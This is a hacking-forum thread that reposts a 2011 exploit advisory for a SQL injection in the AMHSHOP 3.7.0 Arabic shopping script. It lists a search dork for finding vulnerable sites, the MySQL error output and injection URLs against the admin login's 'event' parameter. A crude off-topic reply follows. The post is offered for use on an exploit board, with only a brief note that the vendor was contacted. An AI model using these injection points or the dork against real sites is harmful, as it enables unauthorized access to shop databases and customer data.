Jump to content
Search In
  • More options...
Find results that contain...
Find results in...
Guest expl0iter

AMHSHOP 3.7.0 SQL Injection

By Guest expl0iter, in Exploituri

Recommended Posts

Guest expl0iter

Guest expl0iter

Posted
Posted 

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 
[+] Title            : AMHSHOP 3.7.0 SQL Injection 
[+] Name             : AMHSHOP 3.7.0 
[+] Affected Version : v3.7.0 
[+] Description      : it's an arabic Shopping Script [Payable] 
[+] Software         : http://amhserver.com/37/ & http://www.metjar.com/ 
[+] Tested on        : (L):Vista & Windows Xp and Windows 7 
[+] Dork             : Powered by AMHSHOP 3.7.0 
[+] Date             : 14/06/2011 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 
[+] Author           : Yassin Aboukir 
[+] Contact          : 01Xp01@Gmail.com<script type="text/javascript">
/* <![CDATA[ */
(function(){try{var s,a,i,j,r,c,l=document.getElementById("__cf_email__");a=l.className;if(a){s='';r=parseInt(a.substr(0,2),16);for(j=2;a.length-j;j+=2){c=parseInt(a.substr(j,2),16)^r;s+=String.fromCharCode(c);}s=document.createTextNode(s);l.parentNode.replaceChild(s,l);}}catch(e){}})();
/* ]]> */
</script> 
[+] Site             : http://www.yaboukir.com 
[+] Greetz           : Th3 uNkn0wnS Team ! & All My friends  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 
[+] Error: 
            MySQL 

           * Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''users_login_forgotpassword'' AND user_id = '' LIMIT 1' at line 1 
           * Error Number:1064 
           * SQL: SELECT restricted FROM userspermission WHERE page = 'users_login_forgotpassword'' AND user_id = '' LIMIT 1  



# we had contacted the owner before and some websites have fixed the bug 

[-]   Exploit:- 

    # http://[localhost]/Path/admin/index.php?module=users&page=login&event=[SQL] 
    # http://[localhost]/Path/admin/index.php?module=users&page=login&event=forgotpassword' 


G00D LUCK ALL

src: Exploits Database by Offensive Security

Guest blackboy1337

Guest blackboy1337

Posted
Posted
  DJNeo said:
si cum dau cu el ?

depinde iti zic io o metoda, il prinzi de cur si dai:)))

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...